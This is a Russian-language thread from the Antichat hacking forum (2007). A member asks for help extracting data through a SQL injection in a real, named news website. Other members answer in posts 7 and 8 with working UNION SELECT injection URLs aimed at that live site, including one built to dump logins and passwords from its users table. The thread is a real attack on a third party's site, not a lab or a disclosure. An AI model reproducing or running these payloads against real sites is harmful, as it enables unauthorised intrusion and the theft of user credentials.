ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу sql-inj запросы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

sql-inj запросы
  #1  
Старый 20.04.2007, 13:06
muse
Новичок
Регистрация: 25.09.2005
Сообщений: 29
Провел на форуме:
104355

Репутация: 9
По умолчанию sql-inj запросы
есть сайт с уязвимым параметром page.php?id=35167

подбор колонок показал что их две и есть таблица users но вытащить оттуда что либо неувенчалось успехом
прав на запросы к msql. нету
прошу помощи у профов
 
Ответить с цитированием

  #2  
Старый 20.04.2007, 13:17
limpompo
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553

Репутация: 1329


По умолчанию
поищи таблицы user user admin admins members и так далеее

Кароче займись подбором Таблиц и колонок....
 
Ответить с цитированием

  #3  
Старый 20.04.2007, 13:25
muse
Новичок
Регистрация: 25.09.2005
Сообщений: 29
Провел на форуме:
104355

Репутация: 9
По умолчанию
вы непоняли вопроса.
я немогу вытащить оттуда инфу
например есть таблица users и в ней есть параметр id
но запрос union select 1,id from users ничего не выдает...
 
Ответить с цитированием

  #4  
Старый 20.04.2007, 13:41
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию
Линк дай.
Млять какой же народ пошел.
 
Ответить с цитированием

  #5  
Старый 20.04.2007, 13:50
muse
Новичок
Регистрация: 25.09.2005
Сообщений: 29
Провел на форуме:
104355

Репутация: 9
По умолчанию
http://daily.com.ua/analytics/page.php?id=35167
 
Ответить с цитированием

  #6  
Старый 20.04.2007, 13:51
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию
Помойму иньекция на этот сайт проведена кем то из наших, во всяком случае в антибояне линк есть
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #7  
Старый 20.04.2007, 14:30
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию
http://daily.com.ua/analytics/page.php?id=-1+union+select+1,password+from+users/*
http://daily.com.ua/analytics/page.php?id=-1+union+select+1,2/*
 
Ответить с цитированием

  #8  
Старый 20.04.2007, 16:41
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию
Цитата:
Сообщение от [ cash ]  
http://daily.com.ua/analytics/page.php?id=-1+union+select+1,password+from+users/*
втф? либо я слепой, либо лыжи не едут, но вывода в упор не вижу.

Цитата:
Сообщение от muse  
подбор колонок показал что их две и есть таблица users но вытащить оттуда что либо неувенчалось успехом
http://daily.com.ua/analytics/page.php?id=3516+and(1=-1)+union+select+concat(login,char(95),password),6+ from+users/*
__________________
ПИУ-ПИУ...
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters bxN5 Forum for discussion of ANTICHAT 1 09.04.2007 19:07
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ